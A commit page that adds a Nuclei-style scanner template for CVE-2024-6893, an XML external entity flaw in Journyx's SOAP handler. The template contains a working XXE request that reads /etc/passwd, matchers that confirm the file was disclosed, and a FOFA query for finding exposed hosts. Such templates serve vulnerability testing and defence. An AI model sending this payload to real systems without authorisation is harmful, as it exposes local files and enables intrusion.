Merge pull request #10501 from Kazgangap/journyx

add CVE-2024-6893
patch-10
Dhiyaneshwaran 2024-08-16 22:43:12 -07:00 committed by GitHub
commit 763acd50b0
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 54 additions and 0 deletions

View File

@ -0,0 +1,54 @@
id: CVE-2024-6893
info:
name: Journyx - XML External Entities Injection (XXE)
author: s4eio
severity: high
description: |
The "soap_cgi.pyc" API handler allows the XML body of SOAP requests to contain references to external entities. This allows an unauthenticated attacker to read local files, perform server-side request forgery, and overwhelm the web server resources.
reference:
- https://securityforeveryone.com/tools/journyx-xxe-cve-2024-6893
- https://korelogic.com/Resources/Advisories/KL-001-2024-010.txt
- https://packetstormsecurity.com/files/180005/Journyx-11.5.4-XML-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2024-6893
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-6893
cwe-id: CWE-611
metadata:
max-request: 1
vendor: journyx
product: journyx-jtime
fofa-query: icon_hash="-109972155"
tags: cve,cve2024,journyx,xxe
variables:
pass: "{{rand_text_alpha(5)}}"
http:
- raw:
- |
POST /jtcgi/soap_cgi.pyc HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM "file:///etc/passwd">]><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header/><soapenv:Body><changeUserPassword><username>&test;</username><curpwd>{{pass}}</curpwd><newpwd>{{pass}}</newpwd></changeUserPassword></soapenv:Body></soapenv:Envelope>
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
- 'invalid password for user'
condition: and
- type: word
part: header
words:
- 'text/xml'
- type: status
status:
- 200